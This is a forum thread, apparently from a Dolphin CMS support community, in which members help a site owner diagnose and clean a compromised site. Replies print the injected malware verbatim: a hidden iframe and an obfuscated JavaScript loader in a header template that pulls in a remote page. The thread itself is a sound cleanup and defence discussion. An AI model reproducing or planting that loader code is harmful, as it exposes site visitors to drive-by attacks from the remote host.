 Hi maybe someone can help me i think my site get hacked dont know how or where everything was fine and today i see a box pup in my site on my splash and on the site and even one admin panel i even change the template to see if maybe something was wrong with the template but its still there :( does any one know where i can find that problem and fix it my site is www.thevortex.co thank you Danny |
This is what I've found in your main page. Anything you added? <iframe src="http://www.torsdagsherrer.skjern-net.dk/dtd.php" style="position: absolute; height: 31px; width: 42px; left: 500px; top: 100px;"></iframe> http://ModMyCMS.com --> Dolphin Hacks &Mods |
iframe src="http://www.torsdagsherrer.skjern-net.dk/dtd.php" style="position: absolute; height: 31px; width: 42px; left: 500px; top: 100px;"> <html>
<head></head>
<body>ok</body>
</html>
</iframe>
Geeks, making the world a better place |
Hi no i didnt not add anything to the site what page is that code on? and how did that code get in there? u think my account is hacked ?
Danny |
Yes, your site got infected by a Trojan. Probely from using plain FTP. When you use Plain FTP all your passwords are stored in a text document and readable for every trojan or hacker. What you need to do is: Install antivirus like Kaspersky (you can use a 30 days trial) and scan your computer Precaution : Use always Secure FTP for uploading Do it as soon as possible before Google is blocking your website onlyheavymetal.com |
Hi i use WS_FTP Professional so its not a cheap one ill run a scan on my hosting acount and see if i can find something that get in there but let me ask u this do u know what page name i need to fid this code and remove it im looking every where cant find it
Danny |
Unfortunately, it can be everywhere. It doesn't matter what FTP program you are using. All FTP programs have the option to connect unsecured. Always be sure you use SFTP or FTP over TLS. There a couple more. Never use normal FTP
Check out this link onlyheavymetal.com |
I hope we did not get infected from trying to help :-( Geeks, making the world a better place |
Its in your _sub_header.html file <!--68c8c7--><script type="text/javascript" language="javascript" > (function () { var id = '195'; var u09 = document.createElement('iframe'); u09.src = 'http://www.torsdagsherrer.skjern-net.dk/dtd.php'; u09.style.position = 'absolute'; u09.style.border = '1'; u09.style.height = '31px'; u09.style.width = '42px'; u09.style.left = '500px'; u09.style.top = '100px'; if (!document.getElementById('u')) { document.write('<style>body{overflow-x:hidden;}</style>'); document.write('<div id='u' style="position:absolute; width:80%; height:100%;" ></div>'); document.getElementById('u').appendChild(u09); }})();</script><!--/68c8c7--> so much to do.... |
Hi Geek_girl If your Antivirus didn't block the site or removed the infection. Like i said before, download Kaspersky. Is pretty good in blocking this kind effections and it will remove it from your computer. onlyheavymetal.com |
i also suggest you install malewarebytes onto your comuter ( free one) http://www.malwarebytes.org/products/malwarebytes_free/ and do a scan for malware https://niceday-hosting.co.uk | http://northumberlandfriends.co.uk |http://kids-tv.net |
Just out of curiosity, how did this happen to him? What OS was he using that caused this? I don't use my windows partition when working on my site, only the Ubuntu partition, and MAC OS when using my mac mini. As a suggestion, I've used AVG free for over 10 years on friend's & family's computers that run windows and have had 0 infections. I am pleased with that software. When you identify the malware, please let us know what it was. As a side note, I've had to move and rename my join.php, create a new .htaccess file and I've been having to block IP's by the block on my development site from russia and china over the last 2 weeks. I actually got hit with a 100 posts a second last week on the now non existent join.php. I am just curious if this malware originated from china or not.
http://www.mytikibar.com |
I don't think its a matter of what you use or what he should use, question is what he used or using. so much to do.... |
Yeah, that's what I was trying to find out. http://www.mytikibar.com |
Did a full system scan last night and everything reported OK. Used malwarebytes antimalware. Geeks, making the world a better place |
Hi thank you all for the help i really dont know how it get in there i did a scan on my computer and did my hosting account and now the hosting company doing one more to make sure if there is anything there so far didnt find any viras or spyware but im keep looking to see if i miss anything .. for the questions i use window 7 for my OS and i have AVG anivirse and melwarebytes for spyware im trying to remove the code on my sub_header file but when i try to remove it. it take out all my background so im still trying to figer it out |
i dont know how i get it it just showed hp on my computer on friday morning and i dindt do any update to my site in over 2 weeks so thats why i dont know im useing for OS window 7 .. the question is can one of the memeber had on there computer and login to my site and i get it ? Just out of curiosity, how did this happen to him? What OS was he using that caused this? I don't use my windows partition when working on my site, only the Ubuntu partition, and MAC OS when using my mac mini. As a suggestion, I've used AVG free for over 10 years on friend's & family's computers that run windows and have had 0 infections. I am pleased with that software. When you identify the malware, please let us know what it was. As a side note, I've had to move and rename my join.php, create a new .htaccess file and I've been having to block IP's by the block on my development site from russia and china over the last 2 weeks. I actually got hit with a 100 posts a second last week on the now non existent join.php. I am just curious if this malware originated from china or not.
|
thankg-d thats great news im glad so far on my side nothing yet and i keep runing it and i just get a email from my hosting company they still runing it and it would few more hours but so far nothing if there is any update ill let every one and again thank you i thu 7.1 will be alot more safer and harder for hackers i guess i was wrong :( is there anyway i can put something that block thinks like that to get in to the site before it get in ? Did a full system scan last night and everything reported OK. Used malwarebytes antimalware.
|
The problem probably is not on your server. Once it injected the code in the site, it didn't upload itself on the server, It cannot run in linux environment if created for windows. The problem is not dolphin either, if your system is infected there is not a site that can't be infected. Even if its facebook or google. If security measures aren't taken properly of course. Probably if its not your system, you might have given someone your ftp login to do some stuff on site and his system was infected. So now you can do few things.
I use Bitdefender total 2013 and i take my system security very seriously cuz i don't want people sites that i work on get infected because of me. so much to do.... |
HI i had to do a full restore who ever hacked to my site did a nice job to piss me off i had to clean over 50 files so far that i found so i had to do a full restore :( so i losed a week of activity on the site. i just change everything all my password i think one of guys that i hire to work on my site had something on there computer with out knewing and access my ftp thats why i get it just want to say thank you to every one that help and i hope no one as to deal with this crap
thank you Danny |
Here is a tip. One that i use. https://www.deanbassett.com |
oh truse me deano im doing all that from now on you should have think programers would know if they have some type of virus in there own computers when they work on so many sites but now ill just make sure ill keep eye on everything and recheck the site all the time and do my own backs as well. shit happen i just have to move on :) |
